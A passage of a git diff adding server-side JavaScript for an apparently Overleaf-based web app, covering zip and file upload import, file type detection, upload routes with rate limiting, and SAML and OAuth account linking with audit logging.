= await importFile(fsPath, projectPath) + switch (importInfo.type) { + case 'file': { + const entity = await addFile( + userId, + projectId, + folderId, + name, + importInfo.fsPath, + replace + ) + if (entity != null) { + entity.type = 'file' + } + return entity + } + case 'doc': { + const entity = await addDoc( + userId, + projectId, + folderId, + name, + importInfo.lines, + replace + ) + if (entity != null) { + entity.type = 'doc' + } + return entity + } + default: { + throw new Error(`unknown import type: ${importInfo.type}`) + } + } +} + +async function _isSafeOnFileSystem(path) { + // Use lstat() to ensure we don't follow symlinks. Symlinks from an + // untrusted source are dangerous. + const stat = await fs.promises.lstat(path) + return stat.isFile() || stat.isDirectory() +} + +async function importFile(fsPath, projectPath) { + const stat = await fs.promises.lstat(fsPath) + if (!stat.isFile()) { + throw new Error(`can't import ${fsPath}: not a regular file`) + } + _validateProjectPath(projectPath) + const filename = Path.basename(projectPath) + + const { binary, encoding } = await FileTypeManager.promises.getType( + filename, + fsPath, + null + ) + if (binary) { + return new FileImport(projectPath, fsPath) + } else { + const content = await fs.promises.readFile(fsPath, encoding) + // Handle Unix, DOS and classic Mac newlines + const lines = content.split(/\r\n|\n|\r/) + return new DocImport(projectPath, lines) + } +} + +async function importDir(dirPath) { + const stat = await fs.promises.lstat(dirPath) + if (!stat.isDirectory()) { + throw new Error(`can't import ${dirPath}: not a directory`) + } + const entries = [] + for await (const filePath of _walkDir(dirPath)) { + const projectPath = Path.join('/', Path.relative(dirPath, filePath)) + const importInfo = await importFile(filePath, projectPath) + entries.push(importInfo) + } + return entries +} + +function _validateProjectPath(path) { + if (!SafePath.isAllowedLength(path) || !SafePath.isCleanPath(path)) { + throw new Errors.InvalidNameError(`Invalid path: ${path}`) + } +} + +async function* _walkDir(dirPath) { + const entries = await fs.promises.readdir(dirPath) + for (const entry of entries) { + const entryPath = Path.join(dirPath, entry) + if (await FileTypeManager.promises.shouldIgnore(entryPath)) { + continue + } + + // Use lstat() to ensure we don't follow symlinks. Symlinks from an + // untrusted source are dangerous. + const stat = await fs.promises.lstat(entryPath) + if (stat.isFile()) { + yield entryPath + } else if (stat.isDirectory()) { + yield* _walkDir(entryPath) + } + } +} + +class FileImport { + constructor(projectPath, fsPath) { + this.type = 'file' + this.projectPath = projectPath + this.fsPath = fsPath + } +} + +class DocImport { + constructor(projectPath, lines) { + this.type = 'doc' + this.projectPath = projectPath + this.lines = lines + } +} diff --git a/services/web/app/src/Features/Uploads/FileTypeManager.js b/services/web/app/src/Features/Uploads/FileTypeManager.js new file mode 100644 index 0000000..5dc7ebb --- /dev/null +++ b/services/web/app/src/Features/Uploads/FileTypeManager.js @@ -0,0 +1,111 @@ +const fs = require('fs') +const Path = require('path') +const isUtf8 = require('utf-8-validate') +const { promisifyAll } = require('@overleaf/promise-utils') +const Settings = require('@overleaf/settings') +const Minimatch = require('minimatch').Minimatch + +const fileIgnoreMatcher = new Minimatch(Settings.fileIgnorePattern, { + nocase: true, // make the whole path matching case-insensitive + // (previously we were only matching the extension case-insensitively but it seems safer to match the whole path) + dot: true, // allows matching on paths containing a dot e.g. /.git/foo/bar.txt +}) + +const FileTypeManager = { + TEXT_EXTENSIONS: new Set(Settings.textExtensions.map(ext => `.${ext}`)), + EDITABLE_FILENAMES: Settings.editableFilenames, + + MAX_TEXT_FILE_SIZE: 3 * Settings.max_doc_length, // allow 3 bytes for every character + + isDirectory(path, callback) { + fs.stat(path, (error, stats) => { + if (error != null) { + return callback(error) + } + callback(null, stats.isDirectory()) + }) + }, + + // returns charset as understood by fs.readFile, + getType(name, fsPath, existingFileType, callback) { + if (!name) { + return callback( + new Error( + '[FileTypeManager] getType requires a non-null "name" parameter' + ) + ) + } + if (!fsPath) { + return callback( + new Error( + '[FileTypeManager] getType requires a non-null "fsPath" parameter' + ) + ) + } + const basename = Path.basename(name) + if (existingFileType !== 'doc' && !_isTextFilename(basename)) { + return callback(null, { binary: true }) + } + + fs.stat(fsPath, (err, stat) => { + if (err != null) { + return callback(err) + } + if (stat.size > FileTypeManager.MAX_TEXT_FILE_SIZE) { + return callback(null, { binary: true }) // Treat large text file as binary + } + + fs.readFile(fsPath, (err, bytes) => { + if (err != null) { + return callback(err) + } + const encoding = _detectEncoding(bytes) + const text = bytes.toString(encoding) + if (text.length >= Settings.max_doc_length) { + return callback(null, { binary: true }) // Treat large text file as binary + } + // For compatibility with the history service, only accept valid utf8 with no + // nulls or non-BMP characters as text, eveything else is binary. + if (text.includes('\x00')) { + return callback(null, { binary: true }) + } + if (/[\uD800-\uDFFF]/.test(text)) { + // non-BMP characters (high and low surrogate characters) + return callback(null, { binary: true }) + } + callback(null, { binary: false, encoding }) + }) + }) + }, + + // FIXME: we can convert this to a synchronous function if we want to + shouldIgnore(path, callback) { + // use minimatch file matching to check if the path should be ignored + const ignore = fileIgnoreMatcher.match(path) + callback(null, ignore) + }, +} + +function _isTextFilename(filename) { + const extension = Path.extname(filename).toLowerCase() + return ( + FileTypeManager.TEXT_EXTENSIONS.has(extension) || + FileTypeManager.EDITABLE_FILENAMES.includes(filename.toLowerCase()) + ) +} + +function _detectEncoding(bytes) { + if (isUtf8(bytes)) { + return 'utf-8' + } + // check for little-endian unicode bom (nodejs does not support big-endian) + if (bytes[0] === 0xff && bytes[1] === 0xfe) { + return 'utf-16le' + } + return 'latin1' +} + +module.exports = FileTypeManager +module.exports.promises = promisifyAll(FileTypeManager, { + without: ['getStrictTypeFromContent'], +}) diff --git a/services/web/app/src/Features/Uploads/ProjectUploadController.mjs b/services/web/app/src/Features/Uploads/ProjectUploadController.mjs new file mode 100644 index 0000000..a3bc434 --- /dev/null +++ b/services/web/app/src/Features/Uploads/ProjectUploadController.mjs @@ -0,0 +1,174 @@ +import logger from '@overleaf/logger' +import metrics from '@overleaf/metrics' +import fs from 'node:fs' +import Path from 'node:path' +import FileSystemImportManager from './FileSystemImportManager.js' +import ProjectUploadManager from './ProjectUploadManager.js' +import SessionManager from '../Authentication/SessionManager.js' +import EditorController from '../Editor/EditorController.js' +import ProjectLocator from '../Project/ProjectLocator.js' +import Settings from '@overleaf/settings' +import { InvalidZipFileError } from './ArchiveErrors.js' +import multer from 'multer' +import lodash from 'lodash' +import { expressify } from '@overleaf/promise-utils' +import { DuplicateNameError } from '../Errors/Errors.js' + +const defaultsDeep = lodash.defaultsDeep + +const upload = multer( + defaultsDeep( + { + dest: Settings.path.uploadFolder, + limits: { + fileSize: Settings.maxUploadSize, + }, + }, + Settings.multerOptions + ) +) + +function uploadProject(req, res, next) { + const timer = new metrics.Timer('project-upload') + const userId = SessionManager.getLoggedInUserId(req.session) + const { path } = req.file + const name = Path.basename(req.body.name, '.zip') + return ProjectUploadManager.createProjectFromZipArchive( + userId, + name, + path, + function (error, project) { + fs.unlink(path, function () {}) + timer.done() + if (error != null) { + logger.error( + { err: error, filePath: path, fileName: name }, + 'error uploading project' + ) + if (error instanceof InvalidZipFileError) { + return res.status(422).json({ + success: false, + error: req.i18n.translate(error.message), + }) + } else { + return res.status(500).json({ + success: false, + error: req.i18n.translate('upload_failed'), + }) + } + } else { + return res.json({ success: true, project_id: project._id }) + } + } + ) +} + +async function uploadFile(req, res, next) { + const timer = new metrics.Timer('file-upload') + const name = req.body.name + const path = req.file?.path + const projectId = req.params.Project_id + const userId = SessionManager.getLoggedInUserId(req.session) + let { folder_id: folderId } = req.query + if (name == null || name.length === 0 || name.length > 150) { + return res.status(422).json({ + success: false, + error: 'invalid_filename', + }) + } + + // preserve the directory structure from an uploaded folder + const { relativePath } = req.body + // NOTE: Uppy sends a "null" string for `relativePath` when the file is not nested in a folder + if (relativePath && relativePath !== 'null') { + const { path } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: folderId, + type: 'folder', + }) + const { lastFolder } = await EditorController.promises.mkdirp( + projectId, + Path.dirname(Path.join('/', path.fileSystem, relativePath)), + userId + ) + folderId = lastFolder._id + } + + return FileSystemImportManager.addEntity( + userId, + projectId, + folderId, + name, + path, + true, + function (error, entity) { + fs.unlink(path, function () {}) + timer.done() + if (error != null) { + if (error.name === 'InvalidNameError') { + return res.status(422).json({ + success: false, + error: 'invalid_filename', + }) + } else if (error instanceof DuplicateNameError) { + return res.status(422).json({ + success: false, + error: 'duplicate_file_name', + }) + } else if (error.message === 'project_has_too_many_files') { + return res.status(422).json({ + success: false, + error: 'project_has_too_many_files', + }) + } else if (error.message === 'folder_not_found') { + return res.status(422).json({ + success: false, + error: 'folder_not_found', + }) + } else { + logger.error( + { + err: error, + projectId, + filePath: path, + fileName: name, + folderId, + }, + 'error uploading file' + ) + return res.status(422).json({ success: false }) + } + } else { + return res.json({ + success: true, + entity_id: entity?._id, + entity_type: entity?.type, + hash: entity?.hash, + }) + } + } + ) +} + +function multerMiddleware(req, res, next) { + if (upload == null) { + return res + .status(500) + .json({ success: false, error: req.i18n.translate('upload_failed') }) + } + return upload.single('qqfile')(req, res, function (err) { + if (err instanceof multer.MulterError && err.code === 'LIMIT_FILE_SIZE') { + return res + .status(422) + .json({ success: false, error: req.i18n.translate('file_too_large') }) + } + + return next(err) + }) +} + +export default { + uploadProject, + uploadFile: expressify(uploadFile), + multerMiddleware, +} diff --git a/services/web/app/src/Features/Uploads/ProjectUploadManager.js b/services/web/app/src/Features/Uploads/ProjectUploadManager.js new file mode 100644 index 0000000..d42bc0e --- /dev/null +++ b/services/web/app/src/Features/Uploads/ProjectUploadManager.js @@ -0,0 +1,217 @@ +const Path = require('path') +const fs = require('fs') +const { callbackify } = require('util') +const ArchiveManager = require('./ArchiveManager') +const { Doc } = require('../../models/Doc') +const DocstoreManager = require('../Docstore/DocstoreManager') +const DocumentHelper = require('../Documents/DocumentHelper') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const FileStoreHandler = require('../FileStore/FileStoreHandler') +const FileSystemImportManager = require('./FileSystemImportManager') +const ProjectCreationHandler = require('../Project/ProjectCreationHandler') +const ProjectEntityMongoUpdateHandler = require('../Project/ProjectEntityMongoUpdateHandler') +const ProjectRootDocManager = require('../Project/ProjectRootDocManager') +const ProjectDetailsHandler = require('../Project/ProjectDetailsHandler') +const ProjectDeleter = require('../Project/ProjectDeleter') +const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') + +module.exports = { + createProjectFromZipArchive: callbackify(createProjectFromZipArchive), + createProjectFromZipArchiveWithName: callbackify( + createProjectFromZipArchiveWithName + ), + promises: { + createProjectFromZipArchive, + createProjectFromZipArchiveWithName, + }, +} + +async function createProjectFromZipArchive(ownerId, defaultName, zipPath) { + const contentsPath = await _extractZip(zipPath) + const { path, content } = + await ProjectRootDocManager.promises.findRootDocFileFromDirectory( + contentsPath + ) + + const projectName = + DocumentHelper.getTitleFromTexContent(content || '') || defaultName + const uniqueName = await _generateUniqueName(ownerId, projectName) + const project = await ProjectCreationHandler.promises.createBlankProject( + ownerId, + uniqueName + ) + try { + await _initializeProjectWithZipContents(ownerId, project, contentsPath) + + if (path) { + await ProjectRootDocManager.promises.setRootDocFromName(project._id, path) + } + } catch (err) { + // no need to wait for the cleanup here + ProjectDeleter.promises + .deleteProject(project._id) + .catch(err => + logger.error( + { err, projectId: project._id }, + 'there was an error cleaning up project after importing a zip failed' + ) + ) + throw err + } + await fs.promises.rm(contentsPath, { recursive: true, force: true }) + return project +} + +async function createProjectFromZipArchiveWithName( + ownerId, + proposedName, + zipPath, + attributes = {} +) { + const contentsPath = await _extractZip(zipPath) + const uniqueName = await _generateUniqueName(ownerId, proposedName) + const project = await ProjectCreationHandler.promises.createBlankProject( + ownerId, + uniqueName, + attributes + ) + + try { + await _initializeProjectWithZipContents(ownerId, project, contentsPath) + await ProjectRootDocManager.promises.setRootDocAutomatically(project._id) + } catch (err) { + // no need to wait for the cleanup here + ProjectDeleter.promises + .deleteProject(project._id) + .catch(err => + logger.error( + { err, projectId: project._id }, + 'there was an error cleaning up project after importing a zip failed' + ) + ) + throw err + } + await fs.promises.rm(contentsPath, { recursive: true, force: true }) + return project +} + +async function _extractZip(zipPath) { + const destination = Path.join( + Path.dirname(zipPath), + `${Path.basename(zipPath, '.zip')}-${Date.now()}` + ) + await ArchiveManager.promises.extractZipArchive(zipPath, destination) + return destination +} + +async function _generateUniqueName(ownerId, originalName) { + const fixedName = ProjectDetailsHandler.fixProjectName(originalName) + const uniqueName = await ProjectDetailsHandler.promises.generateUniqueName( + ownerId, + fixedName + ) + return uniqueName +} + +async function _initializeProjectWithZipContents( + ownerId, + project, + contentsPath +) { + const topLevelDir = + await ArchiveManager.promises.findTopLevelDirectory(contentsPath) + const importEntries = + await FileSystemImportManager.promises.importDir(topLevelDir) + const { fileEntries, docEntries } = await _createEntriesFromImports( + project, + importEntries + ) + const projectVersion = + await ProjectEntityMongoUpdateHandler.promises.createNewFolderStructure( + project._id, + docEntries, + fileEntries + ) + await _notifyDocumentUpdater(project, ownerId, { + newFiles: fileEntries, + newDocs: docEntries, + newProject: { version: projectVersion }, + }) + await TpdsProjectFlusher.promises.flushProjectToTpds(project._id) +} + +async function _createEntriesFromImports(project, importEntries) { + const fileEntries = [] + const docEntries = [] + for (const importEntry of importEntries) { + switch (importEntry.type) { + case 'doc': { + const docEntry = await _createDoc( + project, + importEntry.projectPath, + importEntry.lines + ) + docEntries.push(docEntry) + break + } + case 'file': { + const fileEntry = await _createFile( + project, + importEntry.projectPath, + importEntry.fsPath + ) + fileEntries.push(fileEntry) + break + } + default: { + throw new Error(`Invalid import type: ${importEntry.type}`) + } + } + } + return { fileEntries, docEntries } +} + +async function _createDoc(project, projectPath, docLines) { + const projectId = project._id + const docName = Path.basename(projectPath) + const doc = new Doc({ name: docName }) + await DocstoreManager.promises.updateDoc( + projectId.toString(), + doc._id.toString(), + docLines, + 0, + {} + ) + return { doc, path: projectPath, docLines: docLines.join('\n') } +} + +async function _createFile(project, projectPath, fsPath) { + const projectId = project._id + const historyId = project.overleaf?.history?.id + if (!historyId) { + throw new OError('missing history id') + } + const fileName = Path.basename(projectPath) + const { createdBlob, fileRef, url } = + await FileStoreHandler.promises.uploadFileFromDiskWithHistoryId( + projectId, + historyId, + { name: fileName }, + fsPath + ) + return { createdBlob, file: fileRef, path: projectPath, url } +} + +async function _notifyDocumentUpdater(project, userId, changes) { + const projectHistoryId = + project.overleaf && project.overleaf.history && project.overleaf.history.id + await DocumentUpdaterHandler.promises.updateProjectStructure( + project._id, + projectHistoryId, + userId, + changes, + null + ) +} diff --git a/services/web/app/src/Features/Uploads/UploadsRouter.mjs b/services/web/app/src/Features/Uploads/UploadsRouter.mjs new file mode 100644 index 0000000..17ff5af --- /dev/null +++ b/services/web/app/src/Features/Uploads/UploadsRouter.mjs @@ -0,0 +1,55 @@ +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import ProjectUploadController from './ProjectUploadController.mjs' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import Settings from '@overleaf/settings' + +const rateLimiters = { + projectUpload: new RateLimiter('project-upload', { + points: 20, + duration: 60, + }), + fileUpload: new RateLimiter('file-upload', { + points: 500, + duration: 60 * 15, + }), +} + +export default { + apply(webRouter) { + webRouter.post( + '/project/new/upload', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.projectUpload), + ProjectUploadController.multerMiddleware, + ProjectUploadController.uploadProject + ) + + const fileUploadEndpoint = '/Project/:Project_id/upload' + const fileUploadRateLimit = RateLimiterMiddleware.rateLimit( + rateLimiters.fileUpload, + { + params: ['Project_id'], + } + ) + if (Settings.allowAnonymousReadAndWriteSharing) { + webRouter.post( + fileUploadEndpoint, + fileUploadRateLimit, + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + ProjectUploadController.multerMiddleware, + ProjectUploadController.uploadFile + ) + } else { + webRouter.post( + fileUploadEndpoint, + fileUploadRateLimit, + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + ProjectUploadController.multerMiddleware, + ProjectUploadController.uploadFile + ) + } + }, +} diff --git a/services/web/app/src/Features/User/SAMLIdentityManager.js b/services/web/app/src/Features/User/SAMLIdentityManager.js new file mode 100644 index 0000000..dc790c5 --- /dev/null +++ b/services/web/app/src/Features/User/SAMLIdentityManager.js @@ -0,0 +1,468 @@ +const { ObjectId } = require('mongodb-legacy') +const EmailHandler = require('../Email/EmailHandler') +const Errors = require('../Errors/Errors') +const InstitutionsAPI = require('../Institutions/InstitutionsAPI') +const NotificationsBuilder = require('../Notifications/NotificationsBuilder') +const OError = require('@overleaf/o-error') +const SubscriptionLocator = require('../Subscription/SubscriptionLocator') +const UserAuditLogHandler = require('../User/UserAuditLogHandler') +const UserGetter = require('../User/UserGetter') +const UserUpdater = require('../User/UserUpdater') +const logger = require('@overleaf/logger') +const { User } = require('../../models/User') +const { promiseMapWithLimit } = require('@overleaf/promise-utils') + +async function _addAuditLogEntry(operation, userId, auditLog, extraInfo) { + await UserAuditLogHandler.promises.addEntry( + userId, + operation, + auditLog.initiatorId, + auditLog.ipAddress, + extraInfo + ) +} + +async function _ensureCanAddIdentifier(userId, institutionEmail, providerId) { + const userWithProvider = await UserGetter.promises.getUser( + { _id: new ObjectId(userId), 'samlIdentifiers.providerId': providerId }, + { _id: 1 } + ) + + if (userWithProvider) { + throw new Errors.SAMLAlreadyLinkedError() + } + + const userWithEmail = + await UserGetter.promises.getUserByAnyEmail(institutionEmail) + + if (!userWithEmail) { + // email doesn't exist; all good + return + } + + const emailBelongToUser = userWithEmail._id.toString() === userId.toString() + const existingEmailData = userWithEmail.emails.find( + emailData => emailData.email === institutionEmail + ) + + if (!emailBelongToUser && existingEmailData.samlProviderId) { + // email exists and institution link. + // Return back to requesting page with error + throw new Errors.SAMLIdentityExistsError() + } + + if (!emailBelongToUser) { + // email exists but not linked, so redirect to linking page + // which will tell this user to log out to link + throw new Errors.EmailExistsError() + } + + // email belongs to user. Make sure it's already affiliated with the provider + const fullEmails = await UserGetter.promises.getUserFullEmails( + userWithEmail._id + ) + const existingFullEmailData = fullEmails.find( + emailData => emailData.email === institutionEmail + ) + + if (!existingFullEmailData.affiliation) { + throw new Errors.SAMLEmailNotAffiliatedError() + } + + if ( + existingFullEmailData.affiliation.institution.id.toString() !== providerId + ) { + throw new Errors.SAMLEmailAffiliatedWithAnotherInstitutionError() + } +} + +async function _addIdentifier( + userId, + externalUserId, + providerId, + hasEntitlement, + institutionEmail, + providerName, + auditLog, + userIdAttribute +) { + providerId = providerId.toString() + + await _ensureCanAddIdentifier(userId, institutionEmail, providerId) + + const auditLogInfo = { + institutionEmail, + providerId, + providerName, + userIdAttribute, + externalUserId, + } + + await _addAuditLogEntry( + 'link-institution-sso', + userId, + auditLog, + auditLogInfo + ) + + hasEntitlement = !!hasEntitlement + const query = { + _id: userId, + 'samlIdentifiers.providerId': { + $ne: providerId, + }, + } + + const update = { + $push: { + samlIdentifiers: { + hasEntitlement, + externalUserId, + providerId, + userIdAttribute, + }, + }, + } + + try { + // update v2 user record + const updatedUser = await User.findOneAndUpdate(query, update, { + new: true, + }).exec() + if (!updatedUser) { + throw new OError('No update while linking user') + } + return updatedUser + } catch (err) { + if (err.code === 11000) { + throw new Errors.SAMLIdentityExistsError() + } else { + throw OError.tag(err) + } + } +} + +async function _addInstitutionEmail(userId, email, providerId, auditLog) { + const user = await UserGetter.promises.getUser(userId) + const query = { + _id: userId, + 'emails.email': email, + } + const update = { + $set: { + 'emails.$.samlProviderId': providerId.toString(), + }, + } + if (user == null) { + throw new Errors.NotFoundError('user not found') + } + const emailAlreadyAssociated = user.emails.find(e => e.email === email) + if (emailAlreadyAssociated) { + await UserUpdater.promises.updateUser(query, update) + } else { + await UserUpdater.promises.addEmailAddress( + user._id, + email, + { university: { id: providerId }, rejectIfBlocklisted: true }, + auditLog + ) + await UserUpdater.promises.updateUser(query, update) + } +} + +async function _sendLinkedEmail(userId, providerName, institutionEmail) { + const user = await UserGetter.promises.getUser(userId, { email: 1 }) + const emailOptions = { + to: user.email, + actionDescribed: `an Institutional SSO account at ${providerName} was linked to your account ${user.email}`, + action: 'institutional SSO account linked', + message: [ + `<span style="display:inline-block;padding: 0 20px;width:100%;">Linked: <br/><b>${institutionEmail}</b></span>`, + ], + } + EmailHandler.sendEmail('securityAlert', emailOptions, error => { + if (error) { + logger.warn({ err: error }) + } + }) +} + +function _sendUnlinkedEmail(primaryEmail, providerName, institutionEmail) { + const emailOptions = { + to: primaryEmail, + actionDescribed: `an Institutional SSO account at ${providerName} was unlinked from your account ${primaryEmail}`, + action: 'institutional SSO account no longer linked', + message: [ + `<span style="display:inline-block;padding: 0 20px;width:100%;">No longer linked: <br/><b>${institutionEmail}</b></span>`, + ], + } + EmailHandler.sendEmail('securityAlert', emailOptions, error => { + if (error) { + logger.warn({ err: error }) + } + }) +} + +async function getUser(providerId, externalUserId, userIdAttribute) { + if (!providerId || !externalUserId || !userIdAttribute) { + throw new Error( + `invalid arguments: providerId: ${providerId}, externalUserId: ${externalUserId}, userIdAttribute: ${userIdAttribute}` + ) + } + const user = await User.findOne({ + 'samlIdentifiers.externalUserId': externalUserId.toString(), + 'samlIdentifiers.providerId': providerId.toString(), + 'samlIdentifiers.userIdAttribute': userIdAttribute.toString(), + }).exec() + + return user +} + +async function redundantSubscription(userId, providerId, providerName) { + const subscription = + await SubscriptionLocator.promises.getUserIndividualSubscription(userId) + + if (subscription && !subscription.groupPlan) { + await NotificationsBuilder.promises + .redundantPersonalSubscription( + { + institutionId: providerId, + institutionName: providerName, + }, + { _id: userId } + ) + .create() + } +} + +async function linkAccounts(userId, samlData, auditLog) { + const { + externalUserId, + institutionEmail, + universityId: providerId, + universityName: providerName, + hasEntitlement, + userIdAttribute, + } = samlData + + if (!externalUserId || !institutionEmail || !providerId || !userIdAttribute) { + throw new Error( + `missing data when linking institution SSO: ${JSON.stringify(samlData)}` + ) + } + + await _addIdentifier( + userId, + externalUserId, + providerId, + hasEntitlement, + institutionEmail, + providerName, + auditLog, + userIdAttribute + ) + try { + await _addInstitutionEmail(userId, institutionEmail, providerId, auditLog) + } catch (error) { + await _removeIdentifier(userId, providerId) + throw error + } + await UserUpdater.promises.confirmEmail(userId, institutionEmail, { + entitlement: hasEntitlement, + }) // will set confirmedAt if not set, and will always update reconfirmedAt + await _sendLinkedEmail(userId, providerName, institutionEmail) +} + +async function unlinkAccounts( + userId, + institutionEmail, + primaryEmail, + providerId, + providerName, + auditLog +) { + providerId = providerId.toString() + + await _addAuditLogEntry('unlink-institution-sso', userId, auditLog, { + institutionEmail, + providerId, + providerName, + }) + // update v2 user + await _removeIdentifier(userId, providerId) + // update v1 affiliations record + await InstitutionsAPI.promises.removeEntitlement(userId, institutionEmail) + // send email + _sendUnlinkedEmail(primaryEmail, providerName, institutionEmail) +} + +async function _removeIdentifier(userId, providerId) { + providerId = providerId.toString() + + const query = { + _id: userId, + } + const update = { + $pull: { + samlIdentifiers: { + providerId, + }, + }, + } + await User.updateOne(query, update).exec() +} + +async function updateEntitlement( + userId, + institutionEmail, + providerId, + hasEntitlement +) { + providerId = providerId.toString() + hasEntitlement = !!hasEntitlement + const query = { + _id: userId, + 'samlIdentifiers.providerId': providerId.toString(), + } + const update = { + $set: { + 'samlIdentifiers.$.hasEntitlement': hasEntitlement, + }, + } + // update v2 user + await User.updateOne(query, update).exec() +} + +function entitlementAttributeMatches(entitlementAttribute, entitlementMatcher) { + if (Array.isArray(entitlementAttribute)) { + entitlementAttribute = entitlementAttribute.join(' ') + } + if ( + typeof entitlementAttribute !== 'string' || + typeof entitlementMatcher !== 'string' + ) { + return false + } + try { + const entitlementRegExp = new RegExp(entitlementMatcher) + return !!entitlementAttribute.match(entitlementRegExp) + } catch (err) { + logger.error({ err }, 'Invalid SAML entitlement matcher') + // this is likely caused by an invalid regex in the matcher string + // log the error but do not bubble so that user can still sign in + // even if they don't have the entitlement + return false + } +} + +function userHasEntitlement(user, providerId) { + providerId = providerId.toString() + if (!user || !Array.isArray(user.samlIdentifiers)) { + return false + } + for (const samlIdentifier of user.samlIdentifiers) { + if (providerId && samlIdentifier.providerId !== providerId) { + continue + } + if (samlIdentifier.hasEntitlement) { + return true + } + } + return false +} + +async function migrateIdentifier( + userId, + externalUserId, + providerId, + hasEntitlement, + institutionEmail, + providerName, + auditLog, + userIdAttribute +) { + providerId = providerId.toString() + + const query = { + _id: userId, + 'samlIdentifiers.providerId': providerId, + } + + const update = { + $set: { + 'samlIdentifiers.$.externalUserId': externalUserId, + 'samlIdentifiers.$.userIdAttribute': userIdAttribute, + }, + } + await User.updateOne(query, update).exec() + + const auditLogInfo = { + institutionEmail, + providerId, + providerName, + userIdAttribute, + } + + await _addAuditLogEntry( + 'migrate-institution-sso-id', + userId, + auditLog, + auditLogInfo + ) +} + +async function unlinkNotMigrated(userId, providerId, providerName, auditLog) { + providerId = providerId.toString() + + const query = { + _id: userId, + 'emails.samlProviderId': providerId, + } + const update = { + $pull: { + samlIdentifiers: { + providerId, + }, + }, + $unset: { + 'emails.$.samlProviderId': 1, + }, + } + + const originalDoc = await User.findOneAndUpdate(query, update).exec() + + // should only be 1 + const linkedEmails = originalDoc.emails.filter(email => { + return email.samlProviderId === providerId + }) + + const auditLogInfo = { + providerId, + providerName, + } + + await _addAuditLogEntry( + 'unlink-institution-sso-not-migrated', + userId, + auditLog, + auditLogInfo + ) + + await promiseMapWithLimit(10, linkedEmails, async emailData => { + await InstitutionsAPI.promises.removeEntitlement(userId, emailData.email) + }) +} + +const SAMLIdentityManager = { + entitlementAttributeMatches, + getUser, + linkAccounts, + migrateIdentifier, + redundantSubscription, + unlinkAccounts, + unlinkNotMigrated, + updateEntitlement, + userHasEntitlement, +} + +module.exports = SAMLIdentityManager diff --git a/services/web/app/src/Features/User/ThirdPartyIdentityManager.js b/services/web/app/src/Features/User/ThirdPartyIdentityManager.js new file mode 100644 index 0000000..63622dc --- /dev/null +++ b/services/web/app/src/Features/User/ThirdPartyIdentityManager.js @@ -0,0 +1,217 @@ +const UserAuditLogHandler = require('../../../../app/src/Features/User/UserAuditLogHandler') +const EmailHandler = require('../../../../app/src/Features/Email/EmailHandler') +const EmailOptionsHelper = require('../../../../app/src/Features/Email/EmailOptionsHelper') +const Errors = require('../Errors/Errors') +const _ = require('lodash') +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const { User } = require('../../../../app/src/models/User') +const { callbackify } = require('@overleaf/promise-utils') +const OError = require('@overleaf/o-error') + +const oauthProviders = settings.oauthProviders || {} + +async function getUser(providerId, externalUserId) { + if (providerId == null || externalUserId == null) { + throw new OError('invalid SSO arguments', { + externalUserId, + providerId, + }) + } + + const query = _getUserQuery(providerId, externalUserId) + const user = await User.findOne(query).exec() + if (!user) { + throw new Errors.ThirdPartyUserNotFoundError() + } + return user +} + +async function login(providerId, externalUserId, externalData) { + const user = await ThirdPartyIdentityManager.promises.getUser( + providerId, + externalUserId + ) + if (!externalData) { + return user + } + const query = _getUserQuery(providerId, externalUserId) + const update = _thirdPartyIdentifierUpdate( + user, + providerId, + externalUserId, + externalData + ) + return await User.findOneAndUpdate(query, update, { new: true }).exec() +} + +async function link( + userId, + providerId, + externalUserId, + externalData, + auditLog, + retry +) { + const accountLinked = true + if (!oauthProviders[providerId]) { + throw new Error('Not a valid provider') + } + + await UserAuditLogHandler.promises.addEntry( + userId, + 'link-sso', + auditLog.initiatorId, + auditLog.ipAddress, + { + providerId, + } + ) + + const query = { + _id: userId, + 'thirdPartyIdentifiers.providerId': { + $ne: providerId, + }, + } + const update = { + $push: { + thirdPartyIdentifiers: { + externalUserId, + externalData, + providerId, + }, + }, + } + // add new tpi only if an entry for the provider does not exist + // projection includes thirdPartyIdentifiers for tests + let res + try { + res = await User.findOneAndUpdate(query, update, { new: 1 }).exec() + } catch (err) { + if (err.code === 11000) { + throw new Errors.ThirdPartyIdentityExistsError({ + info: { externalUserId }, + }) + } + throw err + } + + if (res) { + _sendSecurityAlert(accountLinked, providerId, res, userId) + return res + } + + if (retry) { + // if already retried then throw error + throw new Error('update failed') + } + + // attempt to clear existing entry then retry + await ThirdPartyIdentityManager.promises.unlink(userId, providerId, auditLog) + return await ThirdPartyIdentityManager.promises.link( + userId, + providerId, + externalUserId, + externalData, + auditLog, + true + ) +} + +async function unlink(userId, providerId, auditLog) { + const accountLinked = false + if (!oauthProviders[providerId]) { + throw new Error('Not a valid provider') + } + + await UserAuditLogHandler.promises.addEntry( + userId, + 'unlink-sso', + auditLog.initiatorId, + auditLog.ipAddress, + { + ...(auditLog.extraInfo || {}), + providerId, + } + ) + + const query = { + _id: userId, + } + const update = { + $pull: { + thirdPartyIdentifiers: { + providerId, + }, + }, + } + // projection includes thirdPartyIdentifiers for tests + const res = await User.findOneAndUpdate(query, update, { new: 1 }) + if (!res) { + throw new Error('update failed') + } + _sendSecurityAlert(accountLinked, providerId, res, userId) + return res +} + +function _getUserQuery(providerId, externalUserId) { + externalUserId = externalUserId.toString() + providerId = providerId.toString() + const query = { + 'thirdPartyIdentifiers.externalUserId': externalUserId, + 'thirdPartyIdentifiers.providerId': providerId, + } + return query +} + +function _sendSecurityAlert(accountLinked, providerId, user, userId) { + const providerName = oauthProviders[providerId].name + const emailOptions = EmailOptionsHelper.linkOrUnlink( + accountLinked, + providerName, + user.email + ) + EmailHandler.promises + .sendEmail('securityAlert', emailOptions) + .catch(error => { + logger.error( + { err: error, userId }, + `could not send security alert email when ${emailOptions.action.toLowerCase()}` + ) + }) +} + +function _thirdPartyIdentifierUpdate( + user, + providerId, + externalUserId, + externalData +) { + providerId = providerId.toString() + // get third party 